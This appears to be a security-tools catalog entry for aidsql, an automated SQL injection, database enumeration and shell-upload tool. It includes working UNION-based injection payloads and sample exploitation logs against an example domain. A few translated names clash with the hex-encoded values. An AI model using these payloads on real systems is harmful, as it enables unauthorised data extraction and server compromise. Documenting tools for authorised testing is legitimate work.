aidsql-en

Back  Español

aidsql

Phase(s):

Primary: Exploitation.
Secondary: N/A.

Description:

Security application developed in PHP that helps identify and exploit in an automated way SQL Injection vulnerabilities.

Objective:

• Automated detection of parameters vulnerable to SQL Injection.
• Automated and configurable data base data mining.
• Automated shell upload in order to comprise the application server.

Features:

Supported technologies: Web applications (HTTP/HTTPS) with a MySQL database backend.

Operative mode: Active.

Automated detection of parameters vulnerable to SQL Injection.

• Automated parameter tampering for both URL parameters (GET) and form data (POST).
• Generates a configurable site-map of the application in order to identify all its resources: pages and parameters for further testing.
• Provides the name of the parameter and URL from the detected vulnerabilities.

Automated and configurable data base data mining.

• Retrieves the following information
  • Database user name.
  • Database name.
  • Database version.
  • Database tables.
  • Database tables schema: keys, fields names and type.

Reports:
Output reports: ✔

• Merge report from the exploitation and data mining in TXT and XML format.

  Basic usage:

  Perform an automated scan on a web application. The following instruction initiates an automated scan on the web application.

  ./aidSQL --url=[URL] --no-shell

  
  

  Dónde:

  • --url: Web application URL address.
  • --no-shell: Disabled the option to upload a shell.

  Note: By defect the tool is configured to perform the data mining and upload a shell upon discovering a vulnerable parameter, thus it is recommended to disable the shell option to minimize the impact it may have on the web application and/or application server.

  The tool will begin with crawling through the web application in order to generate the site-map of the pages and parameters present.

  Normalized URL: http://midominio.com.mx/miaplicacion/
  
  Crawling ...
  
  Fetching content from http://midominio.com.mx/miaplicacion/
  
  200 OK
  
  TOTAL URL's found: 55
  
  Add file index.jsp ...
  
  Page "index.jsp" matches required types php,asp,aspx,cfm,do,jsp,htm,html
  
  Add URL " http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome"
  
  Parsing previously crawled URL, looking for new parameters
  
  Adding new parameter "do"
  

  
  

  This information is used next on the detection of vulnerable parameters through the injection of predefined SQL injections (UNION queries) and the analysis of the web application responses.

  Testing links ...
  
  1. { http://midominio.com.mx/miaplicacion/index.jsp }
  
  Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp
  Set method GET …
  
  Load sqli => mysql5 ... OK
  
  Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome
  
  sql injection plugin...
  
  [1][ [message] | METHOD: unionQuery
  
  [QUERY] | b54293624e8b649e5e948364b6e4a9cb UNION ALL SELECT CONCAT(0x3c61696473716c3e,1,0x3c2f61696473716c3e)/*
  
  Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=b54293624e8b649e5e948364b6e4a9cb+
  UNION+ALL+SELECT+CONCAT%280x3c61696473716c3e%2C1%2C0x3c2f61696473716c3e%29%2F%2A
  [WW] WARNING: GOT 403
  
  [2][ message] | METHOD: unionQuery …
  

  
  

  During the scan execution, when a vulnerable parameter is detected, the data mining will be called to extract the information from the database.

  Site is vulnerable to sql injection!
  
  Skipping calling plugin's get shell method
  
  Fetching database user ...
  
  [message] | METHOD: unionQuery
  
  [QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,USER(),0x3c2f61696473716c3e),3,4,5; -- Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+UNION+ALL+
  SELECT+1%2CCONCAT%280x3c61696473716c3e%2CUSER%28%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5%3B+--+
  FOUND DATABASE seguridad
  [message] | METHOD: unionQuery
  
  [QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
  (TABLE_NAME,0x7c,TABLE_TYPE,0x7c,ENGINE,0x7c,TABLE_COLLATION,0x7c,
  IF(AUTO_INCREMENT,1,0)),0x3c2f61696473716c3e),3,4,5 FROM information_schema.tables WHERE table_schema=0x6f776173703130; --
  Normalized URL:
  http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
  UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
  TABLE_NAME%2C0x7c%2CTABLE_TYPE%2C0x7c%2CENGINE%2C0x7c%2C
  TABLE_COLLATION%2C0x7c%2CIF%28AUTO_INCREMENT%2C1%2C0%29%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+FROM+information_schema.tables+WHERE+table_schema%3D0x6f776173703130%3B+--+
  Fetching table "cuentas" columns ...
  
  [message] | METHOD: unionQuery
  
  [QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
  (COLUMN_NAME,0x7c,COLUMN_TYPE,0x7c,IF(COLUMN_KEY,COLUMN_KEY,0),0x7c,IF(EXTRA,EXTRA,0) SEPARATOR 0x25),0x3c2f61696473716c3e),3,4,5
  FROM information_schema.columns WHERE table_schema=0x6f776173703130 AND table_name=0x6163636f756e7473; --
  Normalized URL:
  http://midominio.com.mx/miaplicacion
  /index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
  UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
  COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+
  FROM+information_schema.columns+
  WHERE+table_schema%3D0x6f776173703130+AND+table_name%3D0x6163636f756e7473%3B+--+&password=prueba&user-info-php-submit-button=View%2BAccount%2BDetails&page=user-info.php

  
  

  When the scan is completed, the tool will display a summary report of the detected vulnerabilities and the scan duration.

  VULNERABLE LINKS FOUND : 1
  TOTAL TIME : 53 seconds
  

  
  

  La herramienta de manera automática, guarda los resultados de la explotación y minado de datos dentro de la capeta interna:

  • Folder /logs/\[application name\]
  • Log file - index.php_console.log
  • XML file - index.php_db_schemas.xml

  index.php_console.log file example:

  HOST midominio.com.mx ------------------------------------
  PLUGIN NAME : UNION
  PLUGIN AUTHOR : Juan Stange
  REQUEST VARIABLES : message, do, info, page,…
  VULNERABLE LINK : http://midominio.com.mx/miaplicacion
  /index.jsp?message==0eb751e9f79eb91238fc1902844d30e6%27+UNION+ALL+
  SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
  COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e
  %29%2C3%2C4%2C5+FROM+information_schema.columns+WHERE+
  table_schema%3D0x6f776173703130+AND+table_name%3D0x70656e5f746573745f746f6f6c73%3B+--+
  ------------------------------------------------
  SCHEMA seguridad
  ------------------------------------------------
  VERSION : 5.5.16
  DATADIR :
  
  TABLE cuentas
  ---------------------
  type : BASE TABLE
  engine : InnoDB
  collation : latin1_swedish_ci
  increment : 1
  
  COLUMNS
  ---------------------
  NAME : cid
  type int(11)
  key 0
  extra 0
  NAME : username
  …
  

  
  

  index.php_db_schemas.xml file example:

  <schemas>
  <database name="owasp10" version="5.5.16" datadir="">
  <tables>
  <table name="accounts" type="BASE TABLE" engine="InnoDB" collation="latin1_swedish_ci" increment="1">
  <column name="cid"><type>int(11)</type><key>0</key><extra>0</extra></column>
  <column name="username"><type>text</type><key>0</key><extra>0</extra></column>
  …
  

  
  

  Resources:

  Link: http://code.google.com/p/aidsql/.
  Author(s): jpfstange
  LynxSec IT consulting and security.
  Contact: lynxsec [at] gmail.com
  IRC: irc.freenode.net #aidsql
  Twitter: http://twitter.com/#!aidsql
  License: GNU GPL v2